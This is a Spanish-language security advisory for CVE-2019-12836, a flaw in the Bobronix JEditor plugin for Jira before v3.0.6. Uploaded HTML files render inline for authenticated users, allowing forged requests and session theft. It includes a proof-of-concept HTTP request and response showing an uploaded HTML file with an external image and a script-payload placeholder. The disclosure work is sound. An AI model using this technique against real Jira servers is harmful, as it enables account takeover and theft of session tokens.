
CVE-2019-12836

JEditor v3.0.5 - Editor WYSIWYG para JIRA
Editor de texto enriquecido simple pero potente para Jira. Importa correos HTML, pega contenido enriquecido, crea plantillas y rellena campos predefinidos.
Bobronix
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12836
JEditor - Editor WYSIWYG para Jira - v3.0.5
JEditor v3.0.5
El editor Bobronix JEditor anterior a la versión v3.0.6 para Jira permite a un atacante añadir una URL/Enlace (a un problema existente) que puede provocar la falsificación de una solicitud a un dominio de origen externo. Esto a su vez puede permitir una solicitud falsificada que puede ser invocada en el contexto de un usuario autenticado, lo que lleva al robo de tokens de sesión y a la toma de control de la cuenta.
JEditor v3.0.5 permite la subida de archivos de varios tipos de extensiones, uno de los cuales es '.HTML'. JEditor es utilizado por JIRA para su funcionalidad de subida de archivos. Usando esta funcionalidad, un atacante puede subir contenido malicioso.
Una vez que el contenido malicioso es subido, se puede realizar una solicitud posterior para el contenido que permite la visualización y renderización en línea del contenido dentro del contexto del navegador de cualquier usuario autenticado. Esto puede permitir a un atacante falsificar una solicitud maliciosa en nombre de cualquier usuario autenticado.
Falsificación de petición en sitios cruzados (CSRF)
Error corregido en JEditor v3.0.6
https://jeditor.zendesk.com/hc/en-us/articles/360029430751-JEditor-3-0-6-release-notes
Permite una solicitud falsificada que resulta en la posibilidad de un vector de ataque del lado del cliente
Se requiere que un usuario autenticado interactúe con el enlace/URL incrustado
Crédito: Victor Hanna (Exploit Security)
GET /plugins/servlet/jeditor_file_provider?imgId=ckupload201906162566696393384747423&fileName=C%3A%5Ctemp%5CPOC.html HTTP/1.1
Host: <vulnerable host>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0)
Accept: text/html,application/xhtml_xml,application/xml;q=0.9,*/*;q=0.8
Accept-Langauge: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<vulnerable host>/secure/Dashboard.jspa
DNT: 1
Connection: close
Cookie: atlassian.xsrf.token=BNXD-VY4I-RCJA-J3YA_34d13dd7fae0f32023fc89838ldc0b6c35991382_lin; JSESSION=42E9F5581BAE499E3E9E45B9D44E6F3C
Upgrade-Insecure-Requests: 1
HTTP/1.1 200
Server: nginx/1.10.2
Date: Sun, 16 Jun 2019 03:06:10 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
X-AREQUESTID: 786x226666x1
X-ASESSIONID: pn6xpm
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-ASEN: SEN-2322842
X-Seraph-LoginReason: OK
X-AUSERNAME:
Content-Disposition: inline; filename="C:\temp\POC.html"
Vary: User-Agent
Content-Length: 236
<html>
<head>
<img src="http://{insert external image location here}">
<script>{JS Payload of any description}</script>
</head>
<body>
<h1>
Welcome to the Jungle !
</h1>
</body>
</html>
Victor Hanna de Exploit Security